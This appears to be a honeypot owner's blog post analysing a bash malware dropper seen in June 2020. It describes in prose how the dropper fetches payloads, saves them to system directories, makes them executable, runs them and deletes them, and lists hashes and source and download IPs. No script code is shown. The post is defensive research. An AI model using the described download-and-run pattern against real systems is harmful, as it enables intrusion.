Script Analysis-

In addition to my weekly threat intel report, I want to highlight a particular file/executable/exploit attempt I saw in the last week.  I’ll do some basic analysis of the file to better understand what it is, and what it’s trying to accomplish. Hopefully this can provide contextual data for those doing their own research.

This week we’re looking at, a malicious file acting as a malware dropper. My logs show an American IP address logged into my honeypot, then reached out to a Croatian IP for the file dropper: When this script is run, it requests a number of additional payloads and attempts to save them to various directories (/tmp, /var/run, /root). Once saved, it changes the scripts permissions to be executable, runs the program, then kills the file after it completes.

Timestamp: 2020-06-08 12:59PM PST
Initiating Source IP:
Downloaded from:
SHA256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
Virus Total Link:

File Contents:

Initiating Source IP Analysis:

Analysis Date2020-06-08 21:39:51
Elapsed Time2 seconds
Blacklist StatusBLACKLISTED 11/114
IP Address104.248.48.57 Find Sites | IP Whois
Reverse DNSprod-nyc1.qencode-encoder-d9bdf0b8a9ec11ea888b0e903d539a24
ISPDigital Ocean
ContinentNorth America
Country CodeFlag  (US) United States
Latitude / Longitude40.793 / -74.0247 Google Map
CityNorth Bergen
RegionNew Jersey

Download URL analysis:

Analysis Date2020-06-08 21:40:37
Elapsed Time3 seconds
Blacklist StatusBLACKLISTED 6/114
IP Address45.95.168.196 Find Sites | IP Whois
ASN OwnerGiganet Internet Szolgaltato Kft
ISPMAXKO j.d.o.o.
Country CodeFlag  (HR) Croatia
Latitude / Longitude45.4675 / 16.3868 Google Map
RegionSisacko-Moslavacka Zupanija

Virus Total Stats:
As of 2020-06-08, 32/60 engines detect this file as malicious

Additional properties:
MD5: a39ab86543f724295ce2678e78d754f5
SHA-1: 7078ca1701557231495c035cba938588e5fb1b2b
SHA-256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
SSDEEP: 12:q0FoV0FS0Fd0c43fX0Fa8eekX0Flk0FVUX0Fg1FZ0FlEX0FC0FdeV8po0F7O0FQ:vo+nyc4krasvVUsg+lEsX9JnQ
File type: Shell script
Magic: Bourne-Again shell script text executable
File size: 1.48 KB (1516 bytes)

Contacted URLS:

Windows Defender:

Virus Total Graph Summary:

Leave a Reply

Your email address will not be published. Required fields are marked *